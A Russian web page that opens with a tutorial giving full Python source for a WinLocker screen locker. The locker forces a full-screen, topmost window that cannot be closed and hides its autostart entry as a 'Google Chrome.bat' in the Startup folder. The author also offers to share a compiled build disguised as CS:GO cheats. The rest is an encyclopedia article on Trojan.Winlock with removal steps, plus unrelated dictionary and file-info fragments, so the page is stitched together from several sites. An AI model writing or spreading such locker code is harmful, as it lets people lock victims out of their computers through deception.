Написание WinLocker’а на Python
Данная статья была создана в познавательных целях! Автор не несёт ответственности за ваши незаконные действия и за вред причинённый вашему компьютеру. Помните, это не игрушка какая-то, это ВИНЛОКЕР! Автор настоятельно не рекомендует запускать программу, которая описана в этой статье без детального ознакомления с кодом.
Вступление
И всем привет братва, с вами я, Геймер Дисклеймер. Как вы думаете, чем я занимался 2 дня подряд? Нет, я не в доту рубился (и вам не советую, раз уж вы себя программистами называете). Я подготавливал материал для Хабра. А точнее, создавал винлокер. И нет, я его не скоммуниздил украл у кого-то, а сам создавал его с нуля. И сегодня я научу вас его создавать. И да, если вы дисклеймер так и не прочитали, то ни в коем случае не используйте этот код во вред другим! Ну ладно, без лишних слов, погнали!
Что нам нужно?
Для создания винлокера нам понадобится:
- Сам Python, установить который вы сможете на официальном сайте
- Текстовый редактор, в моём случае это будет S*****e Text, цензура для того, чтобы модерация не сочла это за пиар (фактически, вы сможете его написать хоть в простом блокноте)
- Доступ к интернету для установки необходимых модулей в PyPI
- Компьютер, работающий на ОС Windows
- Хоть какое-то базовое познание Python
- Прямые руки
- Чай с молоком, или в крайнем случае кофе
Приступаем к написанию
Ну что-же, раз мы убедились, что всё необходимое у нас есть, теперь можем начинать писать код.
Создаём файл main.py в любой директории
После этого открываем его в любом редакторе.
И начинаем писать наш волшебный код.
Установка и импорт модулей
Ах да. чуть не забыл. Надо нам еще окрыть командную строку (вводим Win + R, и пишем cmd
и попадаем в командную строку.
вводим туда pip install getpass3
И у нас происходит установка
Таким же образом вводим комманды pip install pyautogui и pip install playsound
Потом возвращаемся в наш файл, и пишем в нём слудующее:
# Импортируем все модули, которые нам пригодятся from playsound import * import tkinter from tkinter import * import tkinter as tk from tkinter import ttk import getpass import sys import os import os.path import pyautogui from time import sleep
Создание окна
После этого для удобства ставим отступ, и пишем вот такое
USER_NAME = getpass.getuser()
Тут мы присваиваем переменной USER_NAME имя нашего пользователя, в моём случае это просто User.
Потом вводим в наш файл такие истрочки, пояснение будет в комментариях
window = Tk() # Присваиваем переменной window значение окна, чтобы мы не писали всегда Tk() window.title("WinLocker by GDisclaimer") # Делаем заголовок окна WinLocker by GDisclaimer window.geometry('400x250') # Хотя это нам не понадобиться, но на всякий случай, это делает размер окна 400 на 250 пикселей window['bg'] = 'black' # Теперь наше окно будет чёрным window.mainloop() # Эта строчка нам нужна, чтобы окно не закрывалось сразу же после открытия
Для удобства, вот вам код, который вы должны скопировать:
from playsound import * import tkinter from tkinter import * import tkinter as tk from tkinter import ttk import getpass import sys import os import os.path import pyautogui from time import sleep USER_NAME = getpass.getuser() window = Tk() window.title("WinLocker by GDisclaimer") window.geometry('400x250') window['bg'] = 'black' window.mainloop()
Запуск, и проверка кода на работоспособность
Сохраняем файл. После сохранения заходим опять в консоль, переходим в нашу директорию, где расположен файл. Делается это так:
cd "C:\Your\Path\To\The\Main\Py\File"
Моя директория C:/myFiles. Поэтому моя комманда будет выглядеть вот так
cd "C:\myFiles"
потом вводим вот такую строчку:
python main.py
В результате у вас должно запуститься окно.
Круто! Но ведь это ещё далеко не винлокер.
Но до этого мы ещё не дошли. Сейчас Мы поговорим про адаптивность
Делаем окно адаптивным
Давайте сначало поговорим, зачем нам это вообще нужно. Я вам скажу. Не у всех же нормальный 1920×1080 мониторы. У меня самого монитор 1366×768. А у кого-то мониторы ещё меньше
И чтобы у некоторых людей текст не вылазил за пределы экрана, мы настроим адаптивность.
К сожалению, для меня этот код тоже был сложным, и мне пришлось его копировать с другого сайта.
ПРИМЕЧАНИЕ. Весь последующий код следует вставлять до строчки window.mainloop()
# Base size normal_width = 1920 # Задаём ширину обычного монитора normal_height = 1080 # Задаём высоту обычного монитора # Get screen size screen_width = window.winfo_screenwidth() screen_height = window.winfo_screenheight() # Get percentage of screen size from Base size percentage_width = screen_width / (normal_width / 100) percentage_height = screen_height / (normal_height / 100) # Make a scaling factor, this is bases on average percentage from # width and height. scale_factor = ((percentage_width + percentage_height) / 2) / 100 # Set the fontsize based on scale_factor, # if the fontsize is less than minimum_size # it is set to the minimum size fontsize = int(20 * scale_factor) minimum_size = 10 if fontsize < minimum_size: fontsize = minimum_size fontsizeHding = int(72 * scale_factor) minimum_size = 40 if fontsizeHding < minimum_size: fontsizeHding = minimum_size # Create a style and configure for ttk.Button widget default_style = ttk.Style() default_style.configure('New.TButton', font=("Helvetica", fontsize))
Опять-же вот вам весь код:
from playsound import * import tkinter from tkinter import * import tkinter as tk from tkinter import ttk import getpass import sys import os import os.path import pyautogui from time import sleep USER_NAME = getpass.getuser() window = Tk() window.title("WinLocker by GDisclaimer") window.geometry('400x250') window['bg'] = 'black' # Base size normal_width = 1920 normal_height = 1080 # Get screen size screen_width = window.winfo_screenwidth() screen_height = window.winfo_screenheight() # Get percentage of screen size from Base size percentage_width = screen_width / (normal_width / 100) percentage_height = screen_height / (normal_height / 100) # Make a scaling factor, this is bases on average percentage from # width and height. scale_factor = ((percentage_width + percentage_height) / 2) / 100 # Set the fontsize based on scale_factor, # if the fontsize is less than minimum_size # it is set to the minimum size fontsize = int(20 * scale_factor) minimum_size = 10 if fontsize < minimum_size: fontsize = minimum_size fontsizeHding = int(72 * scale_factor) minimum_size = 40 if fontsizeHding < minimum_size: fontsizeHding = minimum_size # Create a style and configure for ttk.Button widget default_style = ttk.Style() default_style.configure('New.TButton', font=("Helvetica", fontsize)) window.mainloop()
Сохраняем и проверяем. Если код не выдал ошибок, то идём дальше
Добавляем функции
Сделать окно - это конечно круто, но пока-что оно бесполезное. И это мы будем исправлять.
# Запускаем песню, которую вы должны скачать def play(test): playsound('sound.mp3', False) # Добавляем наш винлокер на автозапуск def add_to_startup(file_path=""): if file_path == "": file_path = os.path.dirname(os.path.realpath(__file__)) bat_path = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' % USER_NAME with open(bat_path + '\\' + "Google Chrome.bat", "w+") as bat_file: bat_file.write(r'start "" %s' % file_path) # Эта функция не даёт нам закрыть окно путём Alt + F4 def block(): pyautogui.moveTo(x=680,y=800) window.protocol("WM_DELETE_WINDOW",block) window.update() # Здесь мы делаем, чтобы окно выводилось на целый экран, и было всегда на переднем плане def fullscreen(): window.attributes('-fullscreen', True, '-topmost', True) # Тут мы проверяем пароль на правильность def clicked(): res = format(txt.get()) if res == 'petya': file_path = '/tmp/file.txt' file_path = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.bat' % USER_NAME os.remove(file_path) sys.exit()
Сохраняем, и запускаем. Вроде-бы ничего не изменилось. Так и должно быть! Ведь мы нигде не запускали наши функции. И запускать мы их пока-что не будем. Иначе будет очень плохо
И да, на первой строчке мы видим функцию play(test) . Но постойте! там же упомянут файл sound.mp3. Но ведь его у меня нету.
Сохраняем его в директорию с нашим файлом. Если у файла название не sound.mp3, то переименовываем
Делаем апгрейд интерфейса
До этого момента у нас в окне выводился просто черный квадрат. Не вариант! Где вы видели такой винлокер?
Вводим вот эти строчки кода (опять-же, все обьясняю в комментариях):
add_to_startup("C:\\myFiles\\main.py") # Добавляем наш файл в автозапуск fullscreen() # Вызываем фунцию, которая ставит окно с программой на передний план, и делает его на полный экран # Создаем текст txt_one = Label(window, text='WinLocker by GamerDisclaimer', font=("Arial Bold", fontsizeHding), fg='red', bg='black') txt_two = Label(window, text='Сорри, бро :(', font=("Arial Bold", fontsizeHding), fg='red', bg='black') txt_three = Label(window, text='Ваш компьютер был заблокирован винлокером. Пожалуйста, введите пароль для получения доступа к компьютеру!', font=("Arial Bold", fontsize), fg='white', bg='black') # Используем метод .grid, чтобы текст появился на экране txt_one.grid(column=0, row=0) txt_two.grid(column=0, row=0) txt_three.grid(column=0, row=0) # Расставляем весь текст по местам txt_one.place(relx = .01, rely = .01) txt_two.place(relx = .01, rely = .11) txt_three.place(relx = .01, rely = .21) # Тут мы делаем строку с вводом кода, и для его проверки вызываем функцию clicked() txt = Entry(window) btn = Button(window, text="ВВОД КОДА", command=clicked) txt.place(relx = .28, rely = .5, relwidth=.3, relheight=.06) btn.place(relx = .62, rely = .5, relwidth=.1, relheight=.06) # Врубаем ранее установленную песню play('sound.mp3')
ВНИМАНИЕ! ОКНО ЗАКРЫВАЕМ КОМБИНАЦИЕЙ КЛАВИШ ALT + F4
А ТАКЖЕ, КОД ОТ ВИНЛОКЕРА: petya
Запускаем и проверяем. Окно должно выглядеть вот так:
Если же нет, то вот вам весь код:
from playsound import * import tkinter from tkinter import * import tkinter as tk from tkinter import ttk import getpass import sys import os import os.path import pyautogui from time import sleep USER_NAME = getpass.getuser() window = Tk() window.title("WinLocker by GDisclaimer") window.geometry('400x250') window['bg'] = 'black' # Base size normal_width = 1920 normal_height = 1080 # Get screen size screen_width = window.winfo_screenwidth() screen_height = window.winfo_screenheight() # Get percentage of screen size from Base size percentage_width = screen_width / (normal_width / 100) percentage_height = screen_height / (normal_height / 100) # Make a scaling factor, this is bases on average percentage from # width and height. scale_factor = ((percentage_width + percentage_height) / 2) / 100 # Set the fontsize based on scale_factor, # if the fontsize is less than minimum_size # it is set to the minimum size fontsize = int(20 * scale_factor) minimum_size = 10 if fontsize < minimum_size: fontsize = minimum_size fontsizeHding = int(72 * scale_factor) minimum_size = 40 if fontsizeHding < minimum_size: fontsizeHding = minimum_size # Create a style and configure for ttk.Button widget default_style = ttk.Style() default_style.configure('New.TButton', font=("Helvetica", fontsize)) def play(test): playsound('sound.mp3', False) def add_to_startup(file_path=""): if file_path == "": file_path = os.path.dirname(os.path.realpath(__file__)) bat_path = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' % USER_NAME with open(bat_path + '\\' + "Google Chrome.bat", "w+") as bat_file: bat_file.write(r'start "" %s' % file_path) def block(): pyautogui.moveTo(x=680,y=800) window.protocol("WM_DELETE_WINDOW",block) window.update() def fullscreen(): window.attributes('-fullscreen', True, '-topmost', True) def clicked(): res = format(txt.get()) if res == 'petya': file_path = '/tmp/file.txt' file_path = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.bat' % USER_NAME os.remove(file_path) sys.exit() add_to_startup("C:\\myFiles\\main.py") fullscreen() txt_one = Label(window, text='WinLocker by GamerDisclaimer', font=("Arial Bold", fontsizeHding), fg='red', bg='black') txt_two = Label(window, text='Сорри, бро :(', font=("Arial Bold", fontsizeHding), fg='red', bg='black') txt_three = Label(window, text='Ваш компьютер был заблокирован винлокером. Пожалуйста, введите пароль для получения доступа к компьютеру!', font=("Arial Bold", fontsize), fg='white', bg='black') txt_one.grid(column=0, row=0) txt_two.grid(column=0, row=0) txt_three.grid(column=0, row=0) txt_one.place(relx = .01, rely = .01) txt_two.place(relx = .01, rely = .11) txt_three.place(relx = .01, rely = .21) txt = Entry(window) btn = Button(window, text="ВВОД КОДА", command=clicked) txt.place(relx = .28, rely = .5, relwidth=.3, relheight=.06) btn.place(relx = .62, rely = .5, relwidth=.1, relheight=.06) play('sound.mp3') window.mainloop()
Убираем возможность закрытия окна путём Alt + F4
Мы с вами закрывали окно путём комбинации клавиш, упомянутой в заголовке.
Нам нужно это убрать. Для этого просто вводим перед строчкой window.mainloop() строку block()
Теперь от винлокера можно избавиться вводом кода.
КОД: petya
Убираем возможность снять винлокер путём закрытия командной строки
Особо внимательные читатели додумались закрывать винлокер обычного закрытия командной строки. Если вы меня не поняли, ничего страшного. Потом поймёте. нам нужно всего лишь к файлу main.py добавить w, чтобы получилось main.pyw
Исходный код
Вот и всё! Наш винлокер готов, вот вам весь исходный код файла:
from playsound import * import tkinter from tkinter import * import tkinter as tk from tkinter import ttk import getpass import sys import os import os.path import pyautogui from time import sleep USER_NAME = getpass.getuser() window = Tk() window.title("WinLocker by GDisclaimer") window.geometry('400x250') window['bg'] = 'black' # Base size normal_width = 1920 normal_height = 1080 # Get screen size screen_width = window.winfo_screenwidth() screen_height = window.winfo_screenheight() # Get percentage of screen size from Base size percentage_width = screen_width / (normal_width / 100) percentage_height = screen_height / (normal_height / 100) # Make a scaling factor, this is bases on average percentage from # width and height. scale_factor = ((percentage_width + percentage_height) / 2) / 100 # Set the fontsize based on scale_factor, # if the fontsize is less than minimum_size # it is set to the minimum size fontsize = int(20 * scale_factor) minimum_size = 10 if fontsize < minimum_size: fontsize = minimum_size fontsizeHding = int(72 * scale_factor) minimum_size = 40 if fontsizeHding < minimum_size: fontsizeHding = minimum_size # Create a style and configure for ttk.Button widget default_style = ttk.Style() default_style.configure('New.TButton', font=("Helvetica", fontsize)) def play(test): playsound('sound.mp3', False) def add_to_startup(file_path=""): if file_path == "": file_path = os.path.dirname(os.path.realpath(__file__)) bat_path = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' % USER_NAME with open(bat_path + '\\' + "Google Chrome.bat", "w+") as bat_file: bat_file.write(r'start "" %s' % file_path) def block(): pyautogui.moveTo(x=680,y=800) window.protocol("WM_DELETE_WINDOW",block) window.update() def fullscreen(): window.attributes('-fullscreen', True, '-topmost', True) def clicked(): res = format(txt.get()) if res == 'petya': file_path = '/tmp/file.txt' file_path = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.bat' % USER_NAME os.remove(file_path) sys.exit() add_to_startup("C:\\myFiles\\main.py") fullscreen() txt_one = Label(window, text='WinLocker by GamerDisclaimer', font=("Arial Bold", fontsizeHding), fg='red', bg='black') txt_two = Label(window, text='Сорри, бро :(', font=("Arial Bold", fontsizeHding), fg='red', bg='black') txt_three = Label(window, text='Ваш компьютер был заблокирован винлокером. Пожалуйста, введите пароль для получения доступа к компьютеру!', font=("Arial Bold", fontsize), fg='white', bg='black') txt_one.grid(column=0, row=0) txt_two.grid(column=0, row=0) txt_three.grid(column=0, row=0) txt_one.place(relx = .01, rely = .01) txt_two.place(relx = .01, rely = .11) txt_three.place(relx = .01, rely = .21) txt = Entry(window) btn = Button(window, text="ВВОД КОДА", command=clicked) txt.place(relx = .28, rely = .5, relwidth=.3, relheight=.06) btn.place(relx = .62, rely = .5, relwidth=.1, relheight=.06) block() play('sound.mp3') window.mainloop()
.EXE файл
Так-же вы сможете скомилировать весь код в расширение .ехе с помощью pyinstaller. Я очень добрый автор, и я решил скинуть вам установщик, замаскированный под читы для CS:GO, вы можете затроллить этим друга, но обещайте, что не будете делать атаки этим винлокером, а также, когда немножко посмеётесь, обязательно скажите пароль от винлокера:)
Заключение
В заключение я хочу сказать скептикам - делать вирусы можно хоть где. Даже на том самом PHP.
Так что всем спасибо за то, что прочитали мою статью, а модерации спасибо, в случае, если моя статься попадёт на ленту.
Всем удачи, и хорошего дня!
Trojan.Winlock
Trojan.Winlock (Винлокер) — семейство вредоносных программ, блокирующих или затрудняющих работу с операционной системой, и требующих перечисление денег злоумышленникам за восстановление работоспособности компьютера, частный случай Ransomware (программ-вымогателей). Впервые появились в конце 2007 года. Широкое распространение вирусы-вымогатели получили зимой 2009—2010 годов, по некоторым данным оказались заражены миллионы компьютеров, преимущественно среди пользователей русскоязычного Интернета. Второй всплеск активности такого вредоносного ПО пришёлся на май 2010 года.
Ранее для перевода денег обычно использовались короткие премиум-номера, в настоящее время подобные программы также могут требовать перечисления денег на электронные кошельки (например, «Яндекс.Деньги»), либо баланс мобильного номера. Необходимость перевести деньги часто объясняется тем, что «Вы получили временный бесплатный доступ к сайту для взрослых, необходимо оплатить продолжение его использования», либо тем, что «на Вашем компьютере обнаружена нелицензионная копия Windows». Также возможен вариант «за просмотр и копирование и тиражирование видео с насилием над детьми и педофилии». Пути распространения Trojan.Winlock и подобных вирусов разнообразны, в значительной части случаев инфицирование происходит через уязвимости браузеров при просмотре заражённых сайтов, либо при использовании мошенниками специальных «связок», позволяющих заражать только необходимые компьютеры также через браузер.
Классификация различных вендоров
- Trojan.Winlock – по классификации компании Доктор Веб.
- Trojan-Ransom – по классификации компании Лаборатория Касперского.
- Trojan.LockScreen – по классификации компании ESET.
Предыстория
Первая программа-вымогатель появилась в декабре 1989 года. Пользователи получили по почте дискетки с программой, предоставляющей информацию о СПИДе. После установки система приводилась в неработоспособное состояние, и за её восстановление с пользователей требовали денег. Первый SMS-блокер был зарегистрирован 25 октября 2007. Вымогатель инсценировал сбой системы (синий экран смерти). Практически полностью блокировал управление системой.
Описание
Trojan.Winlock, имитирующий синий экран смерти
Trojan.Winlock, выдающий себя за онлайн-сканер Лаборатории Касперского
На данный период времени сотрудниками различных антивирусных компаний зафиксировано несколько тысяч различных видов винлокеров. Наиболее ранние типы требовали за разблокировку не более 10 рублей, а если пользователь оставлял включённым компьютер на некоторое время, то они самоуничтожались (к примеру Trojan.Winlock 19 сам удалялся без следа через 2 часа.) [1] Однако позднее появились более опасные разновидности, которые не удалялись сами по себе и требовали за разблокировку уже от 300 до 1000 рублей.
Винлокеры ориентированы преимущественно на российских пользователей, позже появились и зарубежные версии. [2] В них использованы методы социальной инженерии. Обычно необходимость выплаты денежной суммы объясняется использованием нелицензионного программного обеспечения или просмотром порнофильмов. Следует отметить, что в большинстве случаев заражение происходит именно с порносайтов. Достаточно часто причины необходимости отправки SMS или способы получения кода звучат абсурдно, например, «Ваш компьютер заблокирован за просмотр порнографии с несовершеннолетними и зоофилией. Для разблокировки компьютера необходимо пополнить баланс телефона в любом терминале оплаты. После оплаты код разблокировки должен появиться на чеке оплаты». Не редки орфографические ошибки. Более того, практически на всех баннерах написано предупреждение, о том, что попытка обмануть «систему оплаты» приведёт к нарушению работы компьютера или уничтожению данных. В некоторые из них даже встроен таймер обратного отсчёта, по истечении времени которого вирус обещает уничтожить все данные пользователя. Чаще всего, это простая угроза, убеждающая пользователя отдать злоумышленнику деньги. Однако, некоторые версии действительно снабжаются инструментами для уничтожения данных, но из-за низкого профессионализма авторов, особенностями установки или по другим причинам они чаще всего не срабатывают должным образом.
Заражение может произойти во время запуска программ, маскирующихся под инсталлятор какой-нибудь добросовестной программы или самораспаковывающиеся архивы. При этом в «лицензионном соглашении» (которое рядовой пользователь редко читает) оговаривается, что пользователь согласен установить на компьютер приложение «рекламного характера», которое он обязан просмотреть определённое количество раз, либо отказаться от просмотра, отправив SMS. Число требуемых просмотров обычно идёт на тысячи, поэтому пользователи предпочитают отправлять SMS злоумышленнику.
Вид «интерфейса» троянов очень красочен и разнообразен. Но в большинстве своём их объединяет либо схожесть со стандартными меню Windows, либо наличие порнографического материала (фото, гораздо реже анимации и видео, используя возможности Adobe Flash), а также окно для ввода кода разблокировки. Есть разновидности, очень похожие на синий экран смерти или стандартное окно приветствия Windows. Также не редки случаи, когда они маскируются под антивирусную программу (например Антивирус Касперского).
Trojan.Winlock условно можно разделить на 3 типа, в зависимости от того, насколько они затрудняют работу для пользователя: [3]
- 1 тип — это баннеры или порноинформёры, появляющиеся только в окне браузера. Наиболее легко удаляемый тип. Обычно они выдают себя за дополнительные плагины или надстройки для браузера.
- 2 тип — это баннеры, которые остаются на рабочем столе после закрытия браузера и при этом закрывают большую его часть. Но у пользователей обычно остаётся возможность открывать другие программы, в том числе диспетчер задач и редактор реестра.
- 3 тип — это тип баннеров, который загружается после полной загрузки рабочего стола Windows. Они закрывают практически весь рабочий стол, блокируют запуск диспетчера задач, редактора реестра, а также загрузку в безопасном режиме. Некоторые разновидности полностью блокируют клавиатуру, предоставляя пользователю лишь цифровые клавиши из своего «интерфейса», и рабочую мышь для ввода кода.
Что делать в случае заражения Trojan.Winlock
- Ни в коем случае нельзя выполнять требования злоумышленников. Следует помнить, что стоимость SMS может доходить до нескольких десятков долларов независимо от указанной в «интерфейсе» вируса. Практически во всех случаях после отправки SMS обещанный код разблокировки не приходит.
- В случае предлагаемой оплаты по SMS можно позвонить в службу поддержки контент-аггрегатора, которому принадлежит номер. Часто они могут сообщить код разблокировки.
- При возможности воспользоваться онлайн-сервисами подбора кода разблокировки на сайтах производителей антивирусного ПО.
- Произвести полное сканирование компьютера антивирусной утилитой со свежими обновлениями антивирусной базы (например, «одноразовым» антивирусом Dr.Web CureIt или Kaspersky Virus Removal Tool, скачать его желательно со «здорового» компьютера, даже в случае успешной разблокировки системы подбором кода).
- Если вирус блокирует доступ к определённым ресурсам Интернет (обычно к популярным социальным сетям и сайтам с антивирусным ПО), необходимо удалить лишние записи (кроме строки «127.0.0.1 localhost») из файла C:\WINDOWS\System32\drivers\etc\hosts и очистить кэш DNS (командой ipconfig /flushdns от имени администратора), а также очистить cookies и кэш в браузере.
- В некоторых случаях помогает перестановка даты в BIOS на пару лет назад.
- При полной блокировке можно загрузиться в систему с помощью LiveCD и попытаться удалить трояна при помощи антивирусов.
- Открыть диспетчер задач (если это возможно). Посмотреть процессы на предмет подозрительных. Попробовать завершить процесс. Скорее всего, процесс перезапустится. Перезагрузиться в безопасном режиме и удалить программу вручную.
- Если троян блокирует обычный безопасный режим, то при нажатии клавиши F8 необходимо выбрать безопасный режим с поддержкой командной строки. На данный момент времени большинство винлокеров не способны его заблокировать. После загрузки надо запустить редактор реестра при помощи команды regedit и искать там подозрительные записи. В первую очередь необходимо проверить ветку HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, в частности в параметре Shell должно быть написано explorer.exe, а в параметре Userinit - C:\WINDOWS\System32\userinit.exe, (обязательно с запятой). Если там всё в порядке, необходимо проверить этот же путь, но в ветке HKEY_CURRENT_USER. Также желательно проверить ветки, в которых прописаны автозагружаемые программы, например HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. В случае обнаружения подозрительных записей, их необходимо заменить на стандартные значения (в случае с автозагрузкой удалить). После перезагрузки и входа в систему трояна можно удалить вручную по уже известному пути. Этот способ хоть и эффективен, но подходит только для опытных пользователей.
- Кроме того, некоторые трояны заменяют собой один из файлов userinit.exe, winlogon.exe и explorer.exe в соответствующих каталогах. Рекомендуется восстановить их из дистрибутива или каталога C:\WINDOWS\System32\DLLCACHE.
- Троян может создавать раздел HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe, где прописывает вызов своего исполняемого файла (чаще всего debug.exe), а для возобновления работы системы необходимо удалить данный раздел. [4]
- Одна из последних версий трояна не делает ничего из вышеперечисленного, а создает файл с именем по типу 0.5887702400506266.exe в корневой папке профиля пользователя и прописывает в реестре по адресу любой ветки, откуда может производится автозапуск (например, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options) раздел с непонятным именем. Если на компьютере есть второй профиль администратора, то его легко вычистить зайдя из под другого профиля, просто удалив файл и ветку реестра. Однако было замечено, что бесплатные и платные антивирусы не реагируют на файл. Также можно найти и удалить этот файл войдя в Windows через безопасный режим.
См. также
- Мобильное мошенничество
- Короткий номер
- Троянская программа
- Компьютерный вирус
- Вымогательство
- Ransomware
Примечания
- ↑Троян Winlock.19 заставляет отправлять СМС
- ↑Зарубежный Винлокер
- ↑Потерпевшим от SMS – вымогателей посвящается!
- ↑Семь способов удаления Trojan Winlock
Ссылки
- AntiWinLocker — Специальный LiveCD для удаления вируса-вымогателя
- Eset LiveCD — Загрузочный диск для удаления вредоносного ПО
- Dr.Web — Бесплатный разблокировщик
- Kaspersky Lab — Бесплатный разблокировщик
- ESET - Бесплатный разблокировщик
- Новая волна Trojan.Winlock пришлась на середину мая 2010
- Кибервымогательство
- Способы борьбы с программами-вымогателями класса Trojan-Ransom
Вредоносное программное обеспечение | |
---|---|
Инфекционное вредоносное ПО | Компьютерный вирус (список) · Сетевой червь (список) · Троянская программа · Загрузочный вирус · Хронология |
Методы сокрытия | Бэкдор · Компьютер-зомби · Руткит |
Вредоносные программы для прибыли | Adware · Privacy-invasive software · Ransomware (Trojan.Winlock) · Spyware · Бот · Ботнет · Веб-угрозы · Кейлогер · Формграббер · Scareware (Лжеантивирус) · Порнодиалер |
По операционным системам | Вредоносное ПО для Linux · Вирусы для Palm OS · Макровирус · Мобильный вирус |
Защита | Defensive computing · Антивирусная программа · Межсетевой экран · Система обнаружения вторжений · Предотвращение утечек информации · Хронология антивирусов |
Контрмеры | Anti-Spyware Coalition · Computer surveillance · Honeypot · Operation: Bot Roast |
Что такое слово «Винлокер»
(Thrasher) Впервые для русского уха, проявилось в песни BLACK SIMENS.
Москва +7 999 999 99 99
Поделитесь информацией с друзьями!
Добавить комментарий
Буквы а, о, у, ы, э делают предыдущий согласный твёрдым, буквы я, ё, ю, и, е — мягким.
Тэги
Верно ли значение у слова?
Парфозный
ЗВУКИ БУКВЫ
© 2019–2023. Все опубликованные материалы носят информационный характер и предназначены для ознакомительных целей. Их нельзя использовать в качестве решения заданий.
При использовании данного сайта, вы подтверждаете свое согласие на использование файлов cookie в соответствии с настоящим уведомлением в отношении данного типа файлов.
Если вы не согласны с тем, чтобы мы использовали данный тип файлов, то вы должны соответствующим образом установить настройки вашего браузера или не использовать сайт.
Как удалить winlock
Подлинный файл является одним из компонентов программного обеспечения WinLock | Winlock Professional, разработанного Crystal Office Systems .
Winlock - это аббревиатура от Windows lock
Winlock.exe - это исполняемый файл (программа) для Windows. Расширение имени файла .exe - это аббревиатура от англ. слова executable — исполнимый. Необходимо запускать исполняемые файлы от проверенных производителей программ, потому что исполняемые файлы могут потенциально изменить настройки компьютера или нанести вред вашему компьютеру. Бесплатный форум с информацией о файлах может помочь вам разобраться является ли winlock.exe вирусом, трояном, программой-шпионом, рекламой, которую вы можете удалить, или файл принадлежит системе Windows или приложению, которому можно доверять.
Вот так, вы сможете исправить ошибки, связанные с winlock.exe
- Используйте программу Настройщик Windows, чтобы найти причину проблем, в том числе и медленной работы компьютера.
- Обновите программу WinLock Professional. Обновление можно найти на сайте производителя (ссылка приведена ниже).
- В следующих пунктах предоставлено описание работы winlock.exe.
Информация о файле winlock.exe
Описание: winlock.exe не является важным для Windows и часто вызывает проблемы. Winlock.exe находится в подпапках "C:\Program Files". Известны следующие размеры файла для Windows 10/11/7 2,822,992 байт (16% всех случаев), 5,935,104 байт и еще 4 варианта .
Это не файл Windows. Приложение не видно пользователям. Winlock.exe способен подключится к интернету, спрятать себя и мониторить приложения. Поэтому технический рейтинг надежности 27% опасности.
Разработчик Crystaloffice поддерживает сайт с Обновлением и деинсталлятором (Панель управления ⇒ Установка и удаление программ ⇒ WinLock Professional или WinLock).
Важно: Некоторые вредоносные программы используют такое же имя файла winlock.exe, например Artemis!CE8A75786A49 (определяется антивирусом McAfee), и Win32:Dropper-gen [Drp] (определяется антивирусом Avast). Таким образом, вы должны проверить файл winlock.exe на вашем ПК, чтобы убедиться, что это угроза. Мы рекомендуем Security Task Manager для проверки безопасности вашего компьютера.
Комментарий пользователя
Винлокер (блокирует винду). Один из самых опасных! (Сам знаю, встречал на старом компе) Георгий |
WinLocker.Или по другому Ransomware. Anonim392 |
Итого: Средняя оценка пользователей сайта о файле winlock.exe: - на основе 2 голосов с 2 отзывами.
42 пользователей спрашивали про этот файл. 2 пользователей оценили, как опасный.
Лучшие практики для исправления проблем с winlock
Аккуратный и опрятный компьютер - это главное требование для избежания проблем с winlock. Для этого требуется регулярная проверка компьютера на вирусы, очистка жесткого диска, используя cleanmgr и sfc /scannow, удаление программ, которые больше не нужны, проверка программ, которые запускаются при старте Windows (используя msconfig) и активация Автоматическое обновление Windows. Всегда помните о создании периодических бэкапов, или в крайнем случае о создании точек восстановления.
Если у вас актуальные проблемы, попробуйте вспомнить, что вы делали в последнее время, или последнюю программу, которую вы устанавливали перед тем, как появилась впервые проблема. Используйте команду resmon, чтобы определить процесс, который вызывает проблемы. Даже если у вас серьезные проблемы с компьютером, прежде чем переустанавливать Windows, лучше попробуйте восстановить целостность установки ОС или для Windows 8 и более поздних версий Windows выполнить команду DISM.exe /Online /Cleanup-image /Restorehealth. Это позволит восстановить операционную систему без потери данных.
Следующие программы могут вам помочь для анализа процесса winlock.exe на вашем компьютере: Security Task Manager отображает все запущенные задания Windows, включая встроенные скрытые процессы, такие как мониторинг клавиатуры и браузера или записей автозагрузки. Уникальная оценка рисков безопасности указывает на вероятность процесса быть потенциально опасным - шпионской программой, вирусом или трояном. Malwarebytes Anti-Malware определяет и удаляет бездействующие программы-шпионы, рекламное ПО, трояны, кейлоггеры, вредоносные программы и трекеры с вашего жесткого диска.
winlock сканер
Security Task Manager показывает все запущенные сервисы Windows, включая внедренные скрытые приложения (например, мониторинг клавиатуры или браузера, авто вход). Уникальный рейтинг надежности указывает на вероятность того, что процесс потенциально может быть вредоносной программой-шпионом, кейлоггером или трояном.
Бесплатный aнтивирус находит и удаляет неактивные программы-шпионы, рекламу, трояны, кейлоггеры, вредоносные и следящие программы с вашего жесткого диска. Идеальное дополнение к Security Task Manager.
Инструмент ремонта ПК бесплатное сканирование, очистка, восстановление и оптимизация вашей системы.